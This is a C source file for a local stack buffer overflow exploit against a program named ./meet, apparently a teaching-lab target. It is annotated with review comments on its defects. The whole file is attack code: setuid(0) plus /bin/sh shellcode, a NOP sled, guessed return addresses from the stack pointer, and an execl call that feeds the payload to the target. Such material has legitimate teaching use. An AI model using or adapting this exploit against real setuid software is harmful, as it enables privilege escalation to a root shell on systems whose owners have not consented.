#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
/* Payload bytes handed to the target, written as a C string literal.
 * Presumably x86-32 machine code (the file's get_sp() helper is also
 * i386-specific) followed by the literal text "/bin/sh". main() copies it
 * with strlen(shellcode), so the copy stops at the first 0x00 byte; the
 * array's implicit trailing NUL is the intended end. Reproduced
 * byte-for-byte, escape sequences exactly as in the original. */
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
/*
 * Returns the caller's current stack pointer.
 * There is no `return` statement: the inline asm copies %esp into %eax and
 * the function relies on %eax being the return register, an i386 calling-
 * convention detail rather than anything the C standard guarantees (using
 * the value of a non-void function that falls off its end is undefined
 * behaviour). NOTE(review): `movl %esp,%eax` assumes a 32-bit x86 build;
 * on x86-64 only the low 32 bits of the stack pointer would be copied —
 * confirm the build target.
 */
unsigned long get_sp(void){
__asm__("movl %esp,%eax");
}
/*
 * Program entry point: builds the overflow string, dumps it to ./mycode and
 * passes it as argv[1] to ./meet.
 *
 * argv[1] - buffer size in bytes (default 500)
 * argv[2] - offset subtracted from the stack pointer to form the return
 *           address (default 0)
 * argv[3] - stack pointer value to use instead of the one read by get_sp();
 *           parsed with base 0, so a "0x..." prefix is accepted
 * Returns 0; when execl() succeeds it never returns.
 *
 * Review notes (defects visible in this block, left unchanged here):
 *  - buffer is malloc(size) bytes but buffer[size] is written (one past the end).
 *  - the ret-filling loop stores sizeof(unsigned long) bytes per 4-byte step,
 *    so it stays in bounds only when that size is 4 and size is a multiple of 4.
 *  - malloc() and fopen() results are used without a NULL check.
 *  - "%x" is paired with unsigned long (and int) arguments.
 *  - execl()'s terminating argument is the int 0 rather than a null pointer.
 */
int main(int argc,char *argv[]){ // main function
int offset=0; // pick a specific offset; ESP minus this offset becomes the return address
unsigned long esp,ret,*addr_ptr;
char *buffer,*ptr;
int size = 500; // default buffer size in bytes
esp = get_sp(); // stack pointer of this process; may be overridden by argv[3]
if(argc > 1 ) size = atoi(argv[1]); // atoi() reports no errors; a negative value passes straight through
if(argc > 2 ) offset = atoi(argv[2]);
if(argc > 3 ) esp = strtoul(argv[3],NULL,0);
ret = esp-offset; // guessed return address, repeated throughout the buffer
fprintf(stderr,"Usage: %s <buff_size> <offset> <esp:0xfff...>\n",argv[0]); // printed unconditionally, not only on bad arguments
fprintf(stderr,"ESP:0x%x Offset:0x%x Return:0x%x\n",esp,offset,ret); // %x expects unsigned int; esp and ret are unsigned long (%lx would match)
buffer = (char*)malloc(size); // original comment says "+1 for the '\0'", but no +1 is allocated; result not checked for NULL
ptr = buffer;
addr_ptr = (unsigned long*)ptr;
for(int i=0; i<size; i+=4){ // first fill the whole buffer with ret; each store is sizeof(unsigned long) bytes, the step is 4
*(addr_ptr++)=ret;
}
for(int i=0; i< size/2; i++){ // overwrite the first half with NOPs
buffer[i]='\x90';
}
ptr = buffer + size/2; // point just past the NOP region
for(int i=0; i<strlen(shellcode); i++){ // copy the shellcode in after the NOPs; nothing checks that it fits in the remaining size/2 bytes (int vs size_t compare)
*(ptr++)=shellcode[i];
}
buffer[size]=0; // intended as the terminating '\0', but index size is one past the malloc(size) allocation
// the code below writes the generated buffer to a file so it can be inspected
FILE *fp = NULL;
fp = fopen("./mycode","wb"); // not checked for NULL before fwrite()/fclose()
size_t len = fwrite(buffer,size,1,fp); // return value stored but never examined
printf("buffer has written in mycode\n");
fclose(fp); // return value ignored
execl("./meet","meet",buffer,0); // arguments: program path, argv[0], argv[1], ..., then a null pointer; the 0 here is an int, (char*)NULL is the portable terminator
printf("%s\n",buffer); // only reached if execl() fails
free(buffer); // release the heap buffer
return 0;
}